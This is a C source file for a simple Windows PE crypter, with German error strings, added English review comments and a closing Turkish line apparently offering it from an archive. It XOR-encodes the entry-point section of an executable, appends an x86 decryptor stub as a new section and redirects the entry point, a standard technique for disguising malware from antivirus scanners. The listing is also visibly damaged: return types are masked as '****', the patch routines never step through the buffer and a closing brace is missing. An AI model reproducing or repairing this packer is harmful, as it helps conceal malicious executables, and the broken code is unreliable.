#define CRYPT
#include <stdio.h>
#include <windows.h>
/*
 * In-memory view of a PE file as filled in by load_file().
 * Both header pointers refer into the single heap buffer `data`; the file
 * is held as raw bytes, so main() addresses section contents by file
 * offset (PointerToRawData), not by RVA.
 */
typedef struct _PEFILE
{
IMAGE_DOS_HEADER *idh; /* set by load_file() to the start of `data` */
IMAGE_NT_HEADERS *inh; /* set by load_file() to &data[idh->e_lfanew] */
char *data; /* malloc'd copy of the whole file (sz + 1 bytes are requested) */
int sz; /* file length as returned by ftell() in load_file() */
}
PEFILE;
/* Shorthand for the AddressOfEntryPoint field of a PEFILE value (not a pointer). */
#define EntryPoint(pefile) pefile.inh->OptionalHeader.AddressOfEntryPoint
/*
 * Rounds sz up to the next multiple of alignment.
 * Both arguments are evaluated more than once, and alignment is used as a
 * divisor, so a zero alignment taken from a malformed header divides by zero.
 */
#define Align(sz, alignment) (((sz) % (alignment)) ? ((sz) + (alignment) - ((sz) % (alignment))) : (sz))
/*
 * x86 stub that main() writes to the end of the output file as a new section
 * and makes the file's entry point.
 * With CRYPT defined it first XORs a byte range in memory with a one-byte
 * key, then pushes an address and returns to it.
 * The filler operands are placeholders that main() hands to
 * code_replace_dword() / code_replace_byte():
 *   0xFFFFFFFF -> VirtualAddress of the section main() encoded
 *   0xBBBBBBBB -> OptionalHeader.ImageBase
 *   0xEEEEEEEE -> Misc.VirtualSize of that section
 *   0xDD       -> XOR_KEY
 *   0xCCCCCCCC -> the AddressOfEntryPoint value saved before it was redirected
 * Apart from those operands the byte sequence is constant for every output.
 */
char code[] =
#ifdef CRYPT
"\x9C" /* PUSHFD */
"\x60" /* PUSHAD */
"\xB9\xFF\xFF\xFF\xFF" /* MOV ecx, SectionStart */
"\x81\xC1\xBB\xBB\xBB\xBB" /* ADD ecx, ImageBase */
"\x89\xCA" /* MOV edx, ecx */
"\x81\xC1\xEE\xEE\xEE\xEE" /* ADD ecx, SectionSize */
"\x80\x31\xDD" /* XOR BYTE PTR ds:[ecx], XOR_KEY */
"\x49" /* DEC ECX */
"\x39\xD1" /* CMP ecx, edx */
"\x7D\xF8" /* JGE SHORT _XOR_ */
"\x61" /* POPAD */
"\x9D" /* POPFD */
#endif
"\xBA\xCC\xCC\xCC\xCC" /* MOV edx, EntryPoint */
"\x81\xC2\xBB\xBB\xBB\xBB" /* ADD edx, ImageBase */
"\x52" /* PUSH edx */
"\xC3" /* RETN */
;
/* Length of the stub without the string literal's terminating NUL. */
#define SZ_NEW_SECTION (sizeof(code) - 1)
/*
 * Prints two strings, each followed by CRLF, and terminates the process.
 *
 * text  - first line; printed through "%s", so any "%s" inside it is shown
 *         literally rather than expanded (several callers pass such a string)
 * text2 - second line
 *
 * The process exits with status 0 even though this is the error path, so a
 * calling script cannot tell failure from success.
 * NOTE(review): the return type appears as `****` in this listing —
 * presumably a token masked by the hosting site; the file does not compile
 * as shown. exit() is also used without <stdlib.h> being included.
 */
**** putError(char* text, char* text2)
{
printf("%s\r\n%s\r\n",text,text2);
exit(0);
}
/*
 * Forward declarations for the helpers defined after main().
 * NOTE(review): the return types appear as `****` in this listing —
 * presumably a token masked by the hosting site; confirm against the original.
 * NOTE(review): write_file is declared here with a `const char *` first
 * parameter but defined further down with `char *`.
 */
**** load_file(char *file, PEFILE *pefile);
**** unload_file(PEFILE *pefile);
int calculateSizeOfImage(PEFILE *pefile);
**** code_replace_dword(char *, int, int, int);
**** code_replace_byte(char *, int, char, char);
**** write_file(const char *, PEFILE *, char *, int);
/* One-byte XOR key; main() sets it to 1 before use. */
int XOR_KEY;
/*
 * Reads "useragent.exe", XOR-encodes the section that contains its entry
 * point, appends the `code` stub as an extra section, redirects the entry
 * point to that stub and writes the result to "crypted.exe".
 * Input and output names are hard-coded; there are no command-line options.
 *
 * Fixed properties of every file this program writes (useful when triaging
 * a sample): a section named ".crypted" that gains IMAGE_SCN_MEM_WRITE, a
 * last section named ".loader", AddressOfEntryPoint and BaseOfCode pointing
 * at that last section, and OptionalHeader.CheckSum set to 0.
 *
 * None of the header fields read from the input are range-checked against
 * the size of the loaded buffer, so a malformed input can drive the reads
 * and writes below outside `pefile.data`.
 */
int main()
{
PEFILE pefile;
IMAGE_SECTION_HEADER *ish;
IMAGE_SECTION_HEADER *Encrypted; /* stays uninitialised if no section contains the entry point */
IMAGE_SECTION_HEADER nsec;
int offset, i, j, oep;
XOR_KEY=1;
load_file("useragent.exe", &pefile);
/* Section table is taken to start right after a full IMAGE_NT_HEADERS;
   FileHeader.SizeOfOptionalHeader is not consulted. */
offset = pefile.idh->e_lfanew + sizeof(IMAGE_NT_HEADERS);
for(i = 0; i < pefile.inh->FileHeader.NumberOfSections; i++)
{
/* Point ish at the current header and keep a copy in nsec; after the loop
   nsec is a copy of the last header in the table. */
nsec = *(ish = (IMAGE_SECTION_HEADER *) &pefile.data[offset]);
offset += sizeof(IMAGE_SECTION_HEADER);
/* Is the entry point RVA inside this section's virtual range? */
if (EntryPoint(pefile) >= ish->VirtualAddress &&
EntryPoint(pefile) < (ish->VirtualAddress + ish->Misc.VirtualSize))
{
Encrypted = ish;
#ifdef CRYPT
/* XOR VirtualSize bytes of the raw file data in place. The count is not
   compared with SizeOfRawData or pefile.sz. */
for (j = 0; j < ish->Misc.VirtualSize; j++)
{
pefile.data[ish->PointerToRawData + j] ^= XOR_KEY;
}
#endif
/* ".crypted" is exactly 8 characters, so the copy writes no terminator. */
strncpy((char *) &ish->Name, ".crypted", 8);
/* The stub modifies this section at run time, so it is marked writable. */
ish->Characteristics |= IMAGE_SCN_MEM_WRITE;
}
}
/* offset now addresses the slot after the last section header; refuse to
   continue unless all of its bytes are zero. */
for(i = 0; i < sizeof(IMAGE_SECTION_HEADER); i++)
{
if (pefile.data[offset + i])
{
putError("kein freier Platz fuer den SectionHeader vorhanden", "");
}
}
/* Turn the copy of the last header into the header of the new section. */
strncpy((char *) &nsec.Name, ".loader", 8);
nsec.VirtualAddress += Align(nsec.Misc.VirtualSize, pefile.inh->OptionalHeader.SectionAlignment);
nsec.Misc.VirtualSize = SZ_NEW_SECTION;
nsec.SizeOfRawData = Align(SZ_NEW_SECTION, pefile.inh->OptionalHeader.FileAlignment);
/* Raw data goes at the original file size rounded up to FileAlignment,
   which is where write_file() places the stub. */
nsec.PointerToRawData = Align(pefile.sz, pefile.inh->OptionalHeader.FileAlignment);
nsec.Characteristics = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ;
memcpy(&pefile.data[offset], &nsec, sizeof(IMAGE_SECTION_HEADER));
/* Save the entry point before redirecting it to the new section. */
oep = EntryPoint(pefile);
pefile.inh->OptionalHeader.AddressOfEntryPoint = nsec.VirtualAddress;
pefile.inh->FileHeader.NumberOfSections++;
pefile.inh->OptionalHeader.SizeOfImage = calculateSizeOfImage(&pefile);
pefile.inh->OptionalHeader.BaseOfCode = nsec.VirtualAddress;
pefile.inh->OptionalHeader.CheckSum = 0;
/* Hand each placeholder value in the stub, with its replacement, to the
   patch helpers. Encrypted is dereferenced here without a check that the
   loop above assigned it. */
code_replace_dword(code, SZ_NEW_SECTION, 0xFFFFFFFF, Encrypted->VirtualAddress);
code_replace_dword(code, SZ_NEW_SECTION, 0xEEEEEEEE, Encrypted->Misc.VirtualSize);
code_replace_dword(code, SZ_NEW_SECTION, 0xCCCCCCCC, oep);
code_replace_dword(code, SZ_NEW_SECTION, 0xBBBBBBBB, pefile.inh->OptionalHeader.ImageBase);
code_replace_byte(code, SZ_NEW_SECTION, 0xDD, XOR_KEY);
write_file("crypted.exe", &pefile, code, SZ_NEW_SECTION);
unload_file(&pefile);
}
/*
 * Writes the modified image followed by the stub to `file`.
 *
 * file   - output path, opened with "wb"
 * pefile - loaded image; pefile->sz bytes of pefile->data are written first
 * c      - stub bytes appended after the padding
 * sz     - number of stub bytes
 *
 * Layout produced: image bytes, zero padding up to
 * Align(pefile->sz, FileAlignment), the stub, then
 * Align(pefile->sz, FileAlignment) - sz further zero bytes.
 * The results of fwrite(), fputc() and fclose() are not checked, so a short
 * write goes unnoticed.
 */
**** write_file(char *file, PEFILE *pefile, char *c, int sz)
{
FILE *fp;
int i;
/* putError() exits the process, so fp is non-NULL past this point. */
if (!(fp = fopen(file, "wb")))
putError("konnte die Datei <%s> nicht schreiben", file);
fwrite(pefile->data, 1, pefile->sz, fp);
/* Pad with zeros until the file position reaches the aligned size. */
while(ftell(fp) != Align(pefile->sz, pefile->inh->OptionalHeader.FileAlignment))
{
fputc(0, fp);
}
fwrite(c, 1, sz, fp);
/* Trailing zero fill; the count is derived from the aligned size of the
   original file, not from the new section's SizeOfRawData. */
for(i = 0; i < (Align(pefile->sz, pefile->inh->OptionalHeader.FileAlignment) - sz); i++)
{
fputc(0, fp);
}
fclose(fp);
}
/*
 * Called by main() to swap a 32-bit placeholder in the stub for a real value.
 *
 * code        - buffer holding the stub
 * sz          - number of loop iterations
 * pattern     - value to look for
 * replacement - value to store when the comparison matches
 *
 * As written, the comparison and the store both go through `&code`, the
 * address of the parameter itself, and the loop index `i` does not appear
 * in either expression, so every iteration examines the same location
 * rather than stepping through the buffer.
 * NOTE(review): the listing looks damaged here — confirm against the
 * original before relying on it.
 */
**** code_replace_dword(char *code, int sz, int pattern, int replacement)
{
int i;
for(i = 0; i < sz; i++)
{
if (*((int *) &code) == pattern)
{
*((int *) &code) = replacement;
}
}
}
/*
 * Called by main() to swap the one-byte key placeholder in the stub.
 *
 * code        - buffer holding the stub
 * sz          - number of loop iterations
 * pattern     - byte value to look for
 * replacement - byte value to store when the comparison matches
 *
 * As written, the comparison and the store both go through `&code`, the
 * address of the parameter itself, and the loop index `i` does not appear
 * in either expression, so every iteration examines the same byte.
 * NOTE(review): the listing looks damaged here — confirm against the
 * original before relying on it.
 */
**** code_replace_byte(char *code, int sz, char pattern, char replacement)
{
int i;
for(i = 0; i < sz; i++)
{
if (*((char *) &code) == pattern)
{
*((char *) &code) = replacement;
}
}
}
/*
 * Derives a SizeOfImage value from the section table.
 *
 * Walks NumberOfSections headers starting right after a full
 * IMAGE_NT_HEADERS and, for the section with the highest VirtualAddress
 * seen, computes VirtualAddress + SizeOfRawData rounded up to
 * SectionAlignment.
 *
 * Returns that sum. SizeOfImage is never assigned if no header has a
 * VirtualAddress greater than 0, in which case the return value is
 * indeterminate. The header offsets are not checked against pefile->sz.
 */
int calculateSizeOfImage(PEFILE *pefile)
{
IMAGE_SECTION_HEADER *ish;
int offset;
int i;
int vAddress;
int SizeOfImage;
offset = pefile->idh->e_lfanew + sizeof(IMAGE_NT_HEADERS);
vAddress = 0;
for(i = 0; i < pefile->inh->FileHeader.NumberOfSections; i++)
{
ish = (IMAGE_SECTION_HEADER *) &pefile->data[offset];
offset += sizeof(IMAGE_SECTION_HEADER);
/* Track the highest section RVA; int is compared against a DWORD field. */
if (vAddress < ish->VirtualAddress)
{
vAddress = ish->VirtualAddress;
SizeOfImage = ish->VirtualAddress + Align(ish->SizeOfRawData, pefile->inh->OptionalHeader.SectionAlignment);
}
}
return SizeOfImage;
}
/*
 * Reads the whole of `file` into a heap buffer and locates its DOS and NT
 * headers.
 *
 * file   - path of the input, opened with "rb"
 * pefile - receives data, sz, idh and inh
 *
 * Any failure goes through putError(), which exits the process.
 * Validation is limited to the two signature checks: e_lfanew is used as an
 * index without being compared to sz, and the results of fseek(), ftell()
 * and fread() are not checked, so a truncated or malformed file leads to
 * reads outside the buffer here and in the callers.
 */
**** load_file(char *file, PEFILE *pefile)
{
FILE *fp;
if (!(fp = fopen(file, "rb")))
putError("konnte die Datei <%s> nicht oeffnen", file);
/* Determine the file length by seeking to the end. */
fseek(fp, 0, SEEK_END);
pefile->sz = ftell(fp);
fseek(fp, 0, SEEK_SET);
if (!(pefile->data = (char *) malloc(pefile->sz + 1)))
putError("die Datei passt nicht in den Speicher", "");
fread(pefile->data, 1, pefile->sz, fp);
fclose(fp);
/* TODO: validate the PE header... */
pefile->idh = (IMAGE_DOS_HEADER *) pefile->data;
if(pefile->idh->e_magic != IMAGE_DOS_SIGNATURE)
putError("dos","");
/* e_lfanew comes straight from the file and is not bounds-checked. */
pefile->inh = (IMAGE_NT_HEADERS *) &pefile->data[pefile->idh->e_lfanew];
if(pefile->inh->Signature != IMAGE_NT_SIGNATURE)
putError("nt","");
}
/*
 * Releases the buffer allocated by load_file() and clears the header
 * pointers and the size.
 *
 * pefile - structure previously filled by load_file()
 *
 * pefile->data itself is not reset after free(), so it is left dangling and
 * a second call would free it again.
 * NOTE(review): the function's closing brace is absent from this listing.
 */
**** unload_file(PEFILE *pefile)
{
if (pefile->data)
{
free(pefile->data);
pefile->idh = 0;
pefile->inh = 0;
pefile->sz = 0;
}
arşivde böyle bi kaynak var istersen kullanabilirsin